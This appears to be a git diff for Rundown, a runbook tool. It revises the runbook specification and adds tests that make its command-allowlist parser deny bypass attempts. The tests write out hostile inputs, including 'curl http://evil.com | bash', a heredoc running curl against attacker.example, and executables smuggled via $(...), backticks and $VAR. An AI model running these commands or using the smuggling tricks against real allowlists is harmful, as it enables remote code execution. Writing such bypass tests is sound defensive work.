-1. Parent step 1 runs and its transition completes. The machine evaluates the step's `OUTPUTS`, resolves `PlanPath` via the `{{ path }}` helper (e.g. `.rundown/work/feature-my-work/.rd-a3b8c1d2/2026-02-04-plan.md`), and merges `{ PlanPath: "<resolved path>" }` into the live `context.variables`.
-2. Parent step 2 delegates to the child. The child inherits `ContextId=a3b8c1d2` via `--input`, and the plugin forwards the parent's live variable space (including `PlanPath`) as `--input` flags on the child's `rd claim` invocation.
-3. Child pipeline setup resolves variables: `--input PlanPath=...` binds the value to the declared `inputs:` entry and satisfies `required: PlanPath`.
-4. Child step 1 renders `{{ PlanPath }}` as the forwarded value and executes.
+Defaults:
 
-## 8. Conformance
+| Authored | Implied |
+| --- | --- |
+| Only `PASS` | `FAIL STOP` |
+| Only `FAIL` | `PASS CONTINUE` |
+| Neither | `PASS CONTINUE`, `FAIL STOP` |
+| Substeps under aggregation or delegation | `PASS DEFER`, `FAIL DEFER` |
 
-1.  **Strict Hierarchy**: Steps MUST use H2; substeps MUST use H3. H4 and deeper are not permitted.
-2.  **Sequential IDs**: Numeric steps MUST be sequential (1, 2, 3...; gaps are invalid). Named steps do not participate in sequential numbering.
-3.  **Strict Ordering**: Within a step or substep bullet block, directives MUST appear in this order: OUTPUTS → FOR → DELEGATE → Transitions → Prompt → Body.
-4.  **Exclusivity**: A step MUST have only one body type: either a code block OR substeps (including runbook-list shorthand, which is canonicalized to substeps). Both together are not permitted.
-5.  **Single Code Block**: A step or substep MUST contain at most one code block (executable or display-only).
-6.  **Loop Safety**: `NEXT` and `BREAK` are valid **only** in FOR substeps and FOR iteration-level transitions. Using them at step level outside any FOR loop MUST be rejected by the validator.
-7.  **Source Validation**: FOR clauses referencing a data source MUST reference a defined source. A named variable is REQUIRED.
-8.  **FOR Requires Substeps**: A FOR-annotated step MUST contain substeps.
-9.  **No Nested RETRY**: RETRY fallback actions MUST NOT be RETRY.
-10. **FOR Iteration Action Set**: FOR-level nested transitions MUST only use `CONTINUE`, `DEFER`, `NEXT`, `BREAK`, `GOTO`, `STOP`, `COMPLETE` (plus RETRY wrappers).
-11. **Single Directives**: A step or substep MUST contain at most one OUTPUTS directive.
-12. **Reserved Names in Directives**: OUTPUTS variable names MUST NOT be reserved names (case-insensitive).
-13. **No INPUTS Directive**: The `- INPUTS` step directive has been removed. Implementations MUST use the frontmatter `inputs:` field to declare the variable names the runbook accepts; values are supplied via `--input` flags or other runtime sources at invocation time.
-14. **DELEGATE Ordering**: The `- DELEGATE` annotation MUST appear after `- FOR` (when present) and before transitions, prompt, and body. Misordered DELEGATE MUST be a parse error. (See §4.3.)
-15. **DELEGATE Requires Runbook Target**: Every substep marked `delegate: true` MUST declare at least one runbook target. A bare DELEGATE substep (no runbook bullet) MUST be rejected at parse time. Step-level DELEGATE propagates to all substeps and the same target requirement applies to every propagated child.
-16. **RETRY on DELEGATE is Result-Agnostic**: `rd delegate --retry` MUST succeed regardless of the substep's prior result. Retry re-issues a fresh token by cancelling the current delegation and re-creating one with a new token; the retry hook propagates the canonical FOR-iteration location through `contextSnapshot.at`.
-17. **Parent Orchestration Supersedes Child Lifecycle for Exit Codes**: When a delegated child runbook reaches a terminal lifecycle (e.g. `FAIL STOP` on the child) and a parent absorbs the outcome non-terminally (e.g. `FAIL RETRY`), the child's CLI invocation (`rd pass` / `rd fail`) MUST exit 0. Exit 1 is reserved for cases where the orchestrated workflow has actually halted: no parent linkage exists and the local lifecycle is `stopped`, or the parent's propagation also resolves to `stopped` (e.g. RETRY exhaustion → `STOP` fallback). This lets scripted orchestrators use exit codes as flow control without mistaking an in-progress retry for a terminal failure.
-18. **File-Backed Naked OUTPUTS**: A naked OUTPUTS entry (name only) at step
-    or substep level activates a file-backed channel. `RD_OUTPUTS_<VarName>`
-    MUST be injected only for naked-form entries; expression-form entries MUST
-    produce no file and no env var.
-19. **Mixed OUTPUTS Forms**: A step or substep MAY mix naked and expression
-    OUTPUTS entries within a single OUTPUTS block.
-20. **`RD_OUTPUTS_*` is Rundown-Wins**: `RD_OUTPUTS_<VarName>` MUST always be
-    a valid writable absolute path when the command starts. These env vars MUST
-    be injected by Rundown after policy environment filtering and MUST NOT be
-    blocked or overridden by user-supplied environment variables.
-21. **Captured Output Merge Precedence**: Captured naked outputs MUST merge into
-    `context.variables` using the same precedence as expression-form
-    outputs — same-name keys overwrite existing values.
+<a id="42-actions"></a>
 
-## 9. Compatibility
+### 6.2 Actions
 
-Step-level runbook lists are represented internally as sequential substeps (`N.1`, `N.2`, ...). In-progress sessions created before this model are not auto-migrated and must be restarted after upgrade.
+| Action | Valid context | Rule |
+| --- | --- | --- |
+| `CONTINUE` | Step | Proceed to next step. |
+| `CONTINUE` | `FOR` iteration | Exit loop without accumulating current result. |
+| `DEFER` | Substep, `FOR` iteration | Propagate result to parent aggregation. |
+| `STOP [message]` | Any | Terminate as failure. |
+| `COMPLETE [message]` | Any | Terminate as success. |
+| `GOTO target` | Any | Jump to step or substep target. |
+| `GOTO target AT value` | `FOR` target | Jump to a specific iteration of a `FOR` target. |
+| `RETRY N action` | Any | Retry `N` times, then perform fallback action. |
+| `NEXT` | `FOR` substep or iteration | Advance without accumulating current result. |
+| `BREAK` | `FOR` substep or iteration | Exit loop without accumulating current result. |
 
-Rundown implementations MUST NOT migrate persisted runbook state between versions. This applies to all data under `.rundown/runs/`, including structured state fields and opaque snapshots. When persisted state is stale or structurally incompatible, implementations SHOULD require the user to complete, stop, or prune the run and restart from the source document. See [docs/reference/runtime.md Stale persisted state / no-migration](../reference/runtime.md#stale-persisted-state--no-migration) for runtime recovery details.
+`NEXT` and `BREAK` are invalid outside `FOR`. `DEFER` is invalid at top-level
+step scope. Standalone `- DEFER` expands to `- PASS DEFER` and `- FAIL DEFER`.
+`RETRY` requires both count and fallback; nested `RETRY` fallback is invalid.
+`NEXT` is invalid as a `GOTO` target. `GOTO` to the containing step without `AT`
+can loop indefinitely; use `RETRY` for bounded re-execution.
+
+When `GOTO target` targets a `FOR` step and omits `AT`, execution enters the
+target at the loop's start value: `1` for `FOR 1 TO 10`, `5` for `FOR 5 TO 1`,
+and so on. `GOTO target AT {{Index}}` re-enters the target at the current
+iteration value.
+
+<a id="43-delegate"></a>
+
+## 7. Delegation
+
+`DELEGATE` marks nested runbook work for out-of-process execution. It MUST be a
+bare structural bullet; `DELEGATE value` is invalid.
+
+Valid forms:
+
+| Form | Rule |
+| --- | --- |
+| Step-level `- DELEGATE` | Applies to all substeps. |
+| Per-substep `- DELEGATE` | Applies only to the annotated substep. |
+| Nested under runbook-list entry | Applies only to that list entry. |
+
+Ordering: `FOR` MUST precede `DELEGATE`; `DELEGATE` MUST precede transitions,
+prompt, and body. A delegated substep MUST resolve to at least one runbook
+target, either a `.runbook.md` target or a template target.
+
+When a delegated step is entered, each delegated substep is exposed as a
+delegation frontier item containing an id, runbook target, and token. A child
+claims the token and resolves the claimed work as `PASS` or `FAIL`; the final
+substep resolution auto-aggregates the parent transition. An explicit collection
+operation MAY force aggregation for mixed delegated/non-delegated substeps;
+repeat collection of an already aggregated frame reports `already-aggregated`.
+
+`RETRY N action` on a delegated step cancels and reissues every delegated
+substep in the active frame with fresh tokens, regardless of prior substep
+result. Stale tokens return `TOKEN_CANCELLED`. The retry boundary preserves the
+canonical `FOR` iteration location in the runtime context snapshot and the next
+step entry exposes the new delegation frontier.
+
+When a delegated child reaches a terminal lifecycle but the parent absorbs the
+outcome non-terminally, such as `FAIL RETRY`, the child resolution is not itself
+an orchestrated workflow failure. Terminal failure is reserved for cases where
+there is no parent linkage or the parent's propagation also resolves to a
+terminal stopped state.
+
+<a id="5-iteration-for"></a>
+
+## 8. Iteration
+
+A `FOR` directive repeats a step's substeps.
+
+| Syntax | Meaning |
+| --- | --- |
+| `FOR var IN 1 TO N` | Named numeric range. |
+| `FOR 1 TO N` | Unnamed numeric range. |
+| `FOR var IN N TO 1` | Named descending range. |
+| `FOR N TO 1` | Unnamed descending range. |
+| `FOR var IN N` | Named `1 TO N`. |
+| `FOR N` | Unnamed `1 TO N`. |
+| `FOR var IN 1 TO {{Max}}` | Template-expanded numeric bound. |
+| `FOR var IN {{source}}` | Named data-source iteration. |
+| `FOR var IN 1 TO N OF {{source}}` | Named data-source window. |
+
+Rules:
+
+| Rule | Requirement |
+| --- | --- |
+| Direction | `start > end` descends by `1`; otherwise ascends by `1`. |
+| Single-number shorthand | Always ascends from `1`. |
+| Limits | Numeric bounds and open-ended data sources are capped at 10,000 iterations. |
+| Data-source variable | Data-source iteration MUST use a named variable; `FOR {{source}}` is invalid. |
+| Data-source reference | `{{source}}` names a defined runtime data source and is not template-expanded. |
+| Template bounds | Bounds such as `{{Max}}` are expanded before parsing. |
+| Unresolved bounds | Step becomes `prompted-for`; original `FOR` text is preserved as prompt. |
+| Body | `FOR` MUST have substeps; runbook-list shorthand qualifies. |
+| Scope | Named loop variable is available in substeps as `{{var}}`. |
+
+Data sources are runtime arrays or file-backed JSON/JSONL sources. `file:` paths
+MUST remain inside the project root after symlink resolution. `.jsonl` sources
+are JSON Lines; `.json` sources are JSON arrays or objects, with arrays usable
+for iteration.
+
+### 8.1 Iteration-Level Transitions
+
+Nested bullets under `FOR` MUST be transitions. Allowed actions are `CONTINUE`,
+`DEFER`, `NEXT`, `BREAK`, `GOTO`, `STOP`, `COMPLETE`, and `RETRY` wrappers.
+
+| Action | Records iteration result | Step-level handler fires |
+| --- | --- | --- |
+| `DEFER` | Yes | After final recorded iteration. |
+| `NEXT` | No | After final iteration. |
+| `BREAK` | No | Yes. |
+| `CONTINUE` | No | Yes. |
+| `GOTO` | No | No. |
+| `STOP` | No | No. |
+| `COMPLETE` | No | No. |
+
+Default iteration-level action is `DEFER`. Iteration-level `RETRY` is evaluated
+before the exhausted fallback action and applies to the iteration result, not
+the substep action.
+
+<a id="6-templating"></a>
+
+## 9. Templating
+
+Variables use Handlebars syntax: `{{variable}}`. Dotted paths are supported,
+including `{{context.parent.vars.Name}}`.
+
+Undefined variables are preserved as literal text; a warning is emitted for each
+undefined variable.
+Global variables expand once. Dynamic step, substep, and iteration variables
+expand against the current runtime frame.
+
+### 9.1 Variable Names and Precedence
+
+`step`, `index`, and `context` are reserved case-insensitively and MUST NOT be
+overridden by user variables. Reserved names are rejected in frontmatter
+`inputs`, frontmatter `required`, explicit invocation inputs, input files, and
+configuration files. Reserved `RD_INPUT_*` environment variables are skipped
+with a warning.
+
+Precedence, highest first:
+
+1. Explicit invocation inputs: files, scalar inputs, JSON inputs.
+2. Plugin variables, when resolving a plugin runbook.
+3. `RD_INPUT_*` environment variables, prefix stripped.
+4. Inherited delegation variables.
+5. `.rundown/config.yaml`, discovered from cwd upward.
+6. Built-in defaults.
+7. Context-output inputs, which fill gaps only.
+
+Frontmatter `inputs` declares accepted names; it is not a value layer. Missing
+frontmatter `required` variables produce a hard resolution error
+(`MISSING_REQUIRED_VARS`).
+
+<a id="61-built-in-variables"></a>
+
+### 9.2 Built-In Variables
+
+PascalCase is canonical. Lowercase `step` and `index` aliases are accepted for
+dynamic current-frame values but remain reserved for user input.
+
+| Variable | Rule |
+| --- | --- |
+| `Date`, `DateTime`, `Year`, `Month`, `Day` | Current date/time components. |
+| `Branch` | Current git branch, or empty outside git. |
+| `WorkPath` | Branch-isolated artifact directory; fallback `.rundown/work`; base for `{{ path "..." }}`. |
+| `RunId` | Fresh execution identifier for this runbook execution. |
+| `ContextId` | Shared identity across a delegation tree; scopes `{{ path "..." }}` into `.rd-<ContextId>/`. |
+| `Step`, `Index` | Dynamic current step and iteration. |
+| `context.current.*` | Dynamic current `step`, `substep`, `index`, and `at`. |
+| `context.parent.*` | Parent structural context. |
+| `context.parent.vars.NAME` | Parent resolved variable. |
+| `context.ancestors.N.*` | Ancestor contexts; `0` is nearest parent. |
+| `context.vars.NAME` | Current variable namespace. |
+
+Static built-ins MAY be overridden by higher-precedence sources. Dynamic
+variables MUST NOT be overridden. Parent context chain addressing is capped at
+32 levels. Plugin runbooks MAY receive upper-snake-case plugin variables;
+`CLAUDE_PLUGIN_ROOT` identifies the plugin installation directory.
+
+### 9.3 Shell Environment
+
+Executable shell blocks receive `RD_WORK_PATH`, `RD_CONTEXT_ID`, and `RD_RUN_ID`
+from `WorkPath`, `ContextId`, and `RunId`. These variables are injected after
+policy environment filtering and use Rundown-wins semantics. The `RD_` prefix is
+reserved for Rundown-injected variables.
+
+<a id="7-context-passing-outputs"></a>
+<a id="7-context-passing-inputs--outputs"></a>
+
+## 10. Context Passing
+
+Context passing uses step `OUTPUTS`, frontmatter `outputs`, and delegation
+inheritance.
+
+<a id="71-outputs"></a>
+
+### 10.1 Step `OUTPUTS`
+
+`OUTPUTS` declares values to merge into the live variable space after a step or
+substep completes.
+
+Rules:
+
+| Rule | Requirement |
+| --- | --- |
+| Cardinality | At most one `OUTPUTS` directive per step or substep. |
+| Ordering | MUST be the first directive after the heading. |
+| Names | MUST NOT be reserved runtime names, case-insensitively. |
+| Timing | Evaluated on both `PASS` and `FAIL` transitions. |
+| Forms | Handlebars expression, quoted literal with templates, bare variable reference, or naked file-backed entry. |
+| Merge | Adds new keys and overwrites same-name live variables. |
+| Failure | Failed expressions are omitted and logged; transition is not rolled back. |
+| Status visibility | The merged variable space is exposed in status output as `vars`. |
+
+A naked entry is only a variable name. It activates a file-backed channel:
+Rundown creates a writable UTF-8 file, injects `RD_OUTPUTS_<VarName>` with its
+absolute path, then reads, trims, and merges the file content after command exit.
+Missing, empty, or non-UTF-8 content is omitted. Naked and expression forms MAY
+mix in one `OUTPUTS` block.
+
+File-backed output path scopes:
+
+| Scope | Relative path |
+| --- | --- |
+| Step | `.rundown/runs/<runId>/outputs/<stepId>/<VarName>` |
+| Substep | `.rundown/runs/<runId>/outputs/<stepId>/<substepId>/<VarName>` |
+| `FOR` iteration | `.rundown/runs/<runId>/outputs/<stepId>/<substepId>/<iteration>/<VarName>` |
+
+`RD_OUTPUTS_*` is injected after policy filtering and cannot be blocked or
+overridden by user environment variables. Expression-form entries do not create
+files or environment variables.
+
+The removed `INPUTS` step directive is invalid; use frontmatter `inputs`.
+
+### 10.2 Frontmatter `outputs`
+
+Frontmatter `outputs` is evaluated at terminal `COMPLETE` or `STOPPED`
+transition against the merged variable space. Entries use the same declaration
+grammar as step `OUTPUTS`, except naked frontmatter entries read variables by
+name and do not create file-backed channels. Results are written to final run
+state and forwarded from child runbooks to parent live variables on completion.
+
+### 10.3 Delegation Inheritance
+
+Delegated children inherit the parent's `ContextId` and non-context template
+variables. Step outputs accumulate during execution; terminal frontmatter
+outputs propagate back to the parent.
+
+## 11. Conformance
+
+A conforming parser MUST reject documents that violate any MUST-level rule above.
+In particular:
+
+1. At least one H2 step is required.
+2. H4+ headings are invalid.
+3. Numeric steps must be sequential.
+4. Content ordering is strict.
+5. Body kinds are mutually exclusive.
+6. At most one code block is allowed per step or substep.
+7. Bare code fences are invalid.
+8. `FOR` requires substeps and named variables for data sources.
+9. Nested `FOR` bullets must be transitions.
+10. `NEXT`, `BREAK`, and `DEFER` are valid only in their specified contexts.
+11. `RETRY` requires count and fallback; fallback cannot be `RETRY`.
+12. Aggregation modifiers must be complementary.
+13. At most one `OUTPUTS` directive is allowed per step or substep.
+14. Reserved runtime names are invalid for inputs and outputs.
+15. `INPUTS` step directives are invalid.
+16. `DELEGATE` must be bare, ordered correctly, and target a runbook.
+17. Step-level `DELEGATE` must satisfy target requirements for every child.
+18. `NEXT` is invalid as a `GOTO` target.
+19. `GOTO` to a `FOR` target without `AT` enters at the target loop's start value.
+20. Delegation retry must cancel and reissue every delegated substep in the active frame.
+21. Naked `OUTPUTS` entries alone create `RD_OUTPUTS_<VarName>`.
+
+## 12. Compatibility
+
+Step-level runbook lists are represented as sequential implicit substeps
+(`N.1`, `N.2`, ...).
+
+Rundown implementations MUST NOT migrate persisted runbook state between
+versions. This applies to all data under `.rundown/runs/`, including structured
+state fields and opaque snapshots. When persisted state is stale or structurally
+incompatible, implementations SHOULD require the user to complete, stop, or
+prune the run and restart from the source document. See
+[runtime recovery](../reference/runtime.md#stale-persisted-state--no-migration)
+for operational details.

--- a/packages/claude-code-plugin/__tests__/runbook-rdpath-outputs.integration.test.ts
+++ b/packages/claude-code-plugin/__tests__/runbook-rdpath-outputs.integration.test.ts
@@ -12,16 +12,9 @@
  * `state.variables` assertion model in
  * packages/cli/__tests__/integration/context-passing-outputs.test.ts.
  *
- * Sandbox/policy note: rd run defaults to sandbox-on. We pass --allow-all
- * --non-interactive for this test. The user-realistic alternative — an
- * explicit `--allow-run rdpath,mkdir,...` allowlist — does not work because
- * the policy parser (packages/core/src/policy/parser.ts, shell-quote based)
- * strips $VAR references at parse time and produces empty/literal-$()
- * "executable" names from redirects whose target uses command substitution.
- * Those stray executables never match any allowlist pattern, so the policy
- * denies the bash block. An isolated mkdtemp workspace is a sufficient trust
- * boundary for this fixture; tightening the allowlist further is tracked
- * at https://github.com/tobyhede/rundown/issues/242.
+ * Policy note: uses --allow-run with an explicit allowlist and --no-sandbox for the
+ * mkdtemp workspace (an isolated trust boundary). --allow-write does not reach the
+ * OS sandbox path grants, so --no-sandbox is the correct flag here.
  *
  * Bin-resolution note: rdpath/rdx dist scripts ship without the execute bit,
  * so symlinking them onto $PATH and relying on the shebang fails. We instead
@@ -109,7 +102,15 @@ describe('runbook end-to-end: rdpath + OUTPUTS contract', () => {
   } {
     const result = spawnSync(
       'node',
-      [cliPath, 'run', runbookPath, '--allow-all', '--non-interactive'],
+      [
+        cliPath,
+        'run',
+        runbookPath,
+        '--allow-run',
+        'rdpath,mkdir,printf,dirname',
+        '--no-sandbox',
+        '--non-interactive',
+      ],
       {
         cwd: tempDir,
         encoding: 'utf-8',

--- a/packages/core/__tests__/policy/evaluator.test.ts
+++ b/packages/core/__tests__/policy/evaluator.test.ts
@@ -7,6 +7,14 @@ import { RUNS_DIR } from '../../src/paths.js';
 describe('PolicyEvaluator', () => {
   const repoRoot = '/test/repo';
   const tmpDir = os.tmpdir();
+  const denyRunPolicy = (allow: string[]): PolicyConfig => ({
+    ...DEFAULT_POLICY,
+    default: {
+      ...DEFAULT_POLICY.default,
+      mode: 'deny',
+      run: { allow, deny: [] },
+    },
+  });
 
   describe('checkCommand', () => {
     it('should allow commands in allow list', () => {
@@ -107,6 +115,62 @@ describe('PolicyEvaluator', () => {
       const decision = evaluator.checkCommand('curl http://evil.com | bash');
 
       expect(decision.allowed).toBe(false);
+    });
+
+    it('denies an executable word with embedded dollar substitution despite allowlisted pieces', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git', 'printf']), { repoRoot });
+      const decision = evaluator.checkCommand('git$(printf evil) status');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies an executable word with embedded backtick substitution despite allowlisted pieces', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git', 'printf']), { repoRoot });
+      const decision = evaluator.checkCommand('git`printf evil` status');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies a leading $VAR executable word despite an allowlisted following argument', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git']), { repoRoot });
+      const decision = evaluator.checkCommand('$CMD git');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies an executable word with embedded parameter expansion despite allowlisted prefix', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git']), { repoRoot });
+      const decision = evaluator.checkCommand('git$SUFFIX status');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies an executable word with embedded braced parameter expansion despite allowlisted prefix', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git']), { repoRoot });
+      const decision = evaluator.checkCommand('git${SUFFIX} status');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('still allows static executable words when allowlisted', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git']), { repoRoot });
+      const decision = evaluator.checkCommand('git status');
+
+      expect(decision.allowed).toBe(true);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('still allows command substitutions in arguments when all executables are allowlisted', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['echo', 'printf']), { repoRoot });
+      const decision = evaluator.checkCommand('echo $(printf ok)');
+
+      expect(decision.allowed).toBe(true);
+      expect(decision.requiresPrompt).toBe(false);
     });
 
     it('should deny takes precedence over allow', () => {

--- a/packages/core/__tests__/policy/evaluator.test.ts
+++ b/packages/core/__tests__/policy/evaluator.test.ts
@@ -213,6 +213,17 @@ describe('PolicyEvaluator', () => {
       expect(decision.requiresPrompt).toBe(false);
     });
 
+    it('denies denied executables inside unquoted heredoc command substitutions', () => {
+      const evaluator = new PolicyEvaluator(DEFAULT_POLICY, { repoRoot });
+      const decision = evaluator.checkCommand(
+        ['git status <<EOF', '$(curl https://attacker.example)', 'EOF'].join('\n'),
+      );
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+      expect(decision.subject).toBe('curl');
+    });
+
     it('should deny takes precedence over allow', () => {
       const policy: PolicyConfig = {
         version: 1,

--- a/packages/core/__tests__/policy/evaluator.test.ts
+++ b/packages/core/__tests__/policy/evaluator.test.ts
@@ -197,6 +197,22 @@ describe('PolicyEvaluator', () => {
       expect(decision.requiresPrompt).toBe(false);
     });
 
+    it('denies command substitution content after a comment-hidden closing paren', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['echo', 'printf']), { repoRoot });
+      const decision = evaluator.checkCommand(['echo "$(printf ok # )', 'id', ')"'].join('\n'));
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies backtick substitution content after a comment-hidden closing backtick', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['echo', 'printf']), { repoRoot });
+      const decision = evaluator.checkCommand(['echo "`printf ok # `', 'id', '`"'].join('\n'));
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
     it('should deny takes precedence over allow', () => {
       const policy: PolicyConfig = {
         version: 1,

--- a/packages/core/__tests__/policy/evaluator.test.ts
+++ b/packages/core/__tests__/policy/evaluator.test.ts
@@ -189,6 +189,14 @@ describe('PolicyEvaluator', () => {
       expect(decision.requiresPrompt).toBe(false);
     });
 
+    it('denies multiline backtick substitutions when nested executable is not allowlisted', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['echo']), { repoRoot });
+      const decision = evaluator.checkCommand(['echo `printf hello', 'world`'].join('\n'));
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
     it('should deny takes precedence over allow', () => {
       const policy: PolicyConfig = {
         version: 1,

--- a/packages/core/__tests__/policy/evaluator.test.ts
+++ b/packages/core/__tests__/policy/evaluator.test.ts
@@ -173,6 +173,22 @@ describe('PolicyEvaluator', () => {
       expect(decision.requiresPrompt).toBe(false);
     });
 
+    it('denies shell wrappers when the wrapper executable is not allowlisted', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['git']), { repoRoot });
+      const decision = evaluator.checkCommand('sh -c "git status"');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
+    it('denies dynamic shell wrapper scripts despite an allowlisted wrapper', () => {
+      const evaluator = new PolicyEvaluator(denyRunPolicy(['sh']), { repoRoot });
+      const decision = evaluator.checkCommand('sh -c "$CMD"');
+
+      expect(decision.allowed).toBe(false);
+      expect(decision.requiresPrompt).toBe(false);
+    });
+
     it('should deny takes precedence over allow', () => {
       const policy: PolicyConfig = {
         version: 1,

--- a/packages/core/__tests__/policy/parser.properties.test.ts
+++ b/packages/core/__tests__/policy/parser.properties.test.ts
@@ -1,0 +1,62 @@
+import fc from 'fast-check';
+import { PolicyEvaluator } from '../../src/policy/evaluator.js';
+import { DEFAULT_POLICY, type PolicyConfig } from '../../src/policy/schema.js';
+
+const repoRoot = '/test/repo';
+
+const denyRunPolicy = (allow: string[]): PolicyConfig => ({
+  ...DEFAULT_POLICY,
+  default: {
+    ...DEFAULT_POLICY.default,
+    mode: 'deny',
+    run: { allow, deny: [] },
+  },
+});
+
+const prefixArb = fc.constantFrom('git', 'npm', 'node', 'echo', 'tool');
+const suffixArb = fc.constantFrom('x', '-evil', '_evil', '2');
+
+const dynamicExecutableCommandArb = fc
+  .record({
+    prefix: prefixArb,
+    suffix: suffixArb,
+    substitutionKind: fc.constantFrom<'dollar' | 'backtick' | 'var' | 'bracedVar'>(
+      'dollar',
+      'backtick',
+      'var',
+      'bracedVar',
+    ),
+    wrapper: fc.constantFrom<'bare' | 'env' | 'pipeline'>('bare', 'env', 'pipeline'),
+  })
+  .map(({ prefix, suffix, substitutionKind, wrapper }) => {
+    const substitutionByKind = {
+      dollar: `$(printf ${suffix})`,
+      backtick: `\`printf ${suffix}\``,
+      var: '$SUFFIX',
+      bracedVar: '${SUFFIX}',
+    };
+    const substitution = substitutionByKind[substitutionKind];
+    const command = `${prefix}${substitution} status`;
+
+    if (wrapper === 'env') return `ENV=value ${command}`;
+    if (wrapper === 'pipeline') return `${command} | cat`;
+    return command;
+  });
+
+describe('Command parser properties', () => {
+  it('never allows executable words with embedded substitutions as static allowlist matches', () => {
+    fc.assert(
+      fc.property(dynamicExecutableCommandArb, (command) => {
+        const evaluator = new PolicyEvaluator(
+          denyRunPolicy(['git', 'npm', 'node', 'echo', 'tool', 'printf', 'cat']),
+          { repoRoot },
+        );
+
+        const decision = evaluator.checkCommand(command);
+
+        expect(decision.allowed).toBe(false);
+      }),
+      { numRuns: 200 },
+    );
+  });
+});

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -292,6 +292,14 @@ describe('Command Parser', () => {
       expect(result).toEqual(['cat']);
     });
 
+    it('extracts command substitutions from unquoted heredoc bodies', () => {
+      const command = ['cat <<EOF', '$(curl https://attacker.example)', 'EOF'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('cat');
+      expect(result).toContain('curl');
+    });
+
     it('resumes command extraction after a heredoc terminator line', () => {
       const command = ['cat <<EOF', 'printf hi', 'EOF', 'git status'].join('\n');
       const result = extractAllExecutables(command);

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -187,4 +187,38 @@ describe('Command Parser', () => {
       expect(result).toEqual([]);
     });
   });
+
+  describe('extractAllExecutables — issue #242 regression cases', () => {
+    it('multiline bash block: no empty string, all executables found', () => {
+      const command = [
+        'TARGET="$(rdpath --dir "$RD_WORK_PATH" --ctx "$RD_CONTEXT_ID" --file fixture.json)"',
+        'mkdir -p "$(dirname "$TARGET")"',
+        'printf \'%s\\n\' \'{"ok":true}\' > "$TARGET"',
+      ].join('\n');
+
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('rdpath');
+      expect(result).toContain('mkdir');
+      expect(result).toContain('dirname');
+      expect(result).toContain('printf');
+      expect(result).not.toContain('');
+    });
+
+    it('$() in redirect target: no literal $(...) executable', () => {
+      const command = 'echo hello > "$(rdpath --dir /tmp --file out.txt)"';
+
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('echo');
+      expect(result).toContain('rdpath');
+      expect(result.some((e) => e.startsWith('$('))).toBe(false);
+    });
+
+    it('fd-redirect digit suppression: 2>/dev/null does not produce phantom "2"', () => {
+      const result = extractAllExecutables('cmd 2>/dev/null');
+
+      expect(result).toEqual(['cmd']);
+    });
+  });
 });

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -2,6 +2,7 @@ import {
   extractCommands,
   extractPrimaryExecutable,
   extractAllExecutables,
+  DYNAMIC_EXECUTABLE_SENTINEL,
 } from '../../src/policy/parser.js';
 
 describe('Command Parser', () => {
@@ -219,6 +220,19 @@ describe('Command Parser', () => {
       const result = extractAllExecutables('cmd 2>/dev/null');
 
       expect(result).toEqual(['cmd']);
+    });
+
+    it('embedded substitution in executable word: prefix is not accepted as safe', () => {
+      // git$(printf evil) runs 'gitevil' (or similar), NOT 'git'.
+      // A policy allowing git,printf must not accept this command.
+      const result = extractAllExecutables('git$(printf evil) status');
+
+      // The literal prefix 'git' must NOT appear — it is not the real executable.
+      expect(result).not.toContain('git');
+      // The sentinel must be present so the policy evaluator denies the command.
+      expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
+      // printf IS inside the substitution and will be found by extractDollarSubstitutions.
+      expect(result).toContain('printf');
     });
   });
 });

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -276,6 +276,15 @@ describe('Command Parser', () => {
       expect(result).toContain('git');
     });
 
+    it('ignores closing parens inside substitution comments', () => {
+      const command = ['echo "$(printf ok # )', 'id', ')"'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
+      expect(result).toContain('id');
+    });
+
     it('does not extract executables from heredoc body lines or terminators', () => {
       const command = ['cat <<EOF', 'printf hi', 'EOF'].join('\n');
       const result = extractAllExecutables(command);
@@ -350,6 +359,15 @@ describe('Command Parser', () => {
 
       expect(result).toContain('echo');
       expect(result).toContain('printf');
+    });
+
+    it('ignores closing backticks inside backtick substitution comments', () => {
+      const command = ['echo "`printf ok # `', 'id', '`"'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
+      expect(result).toContain('id');
     });
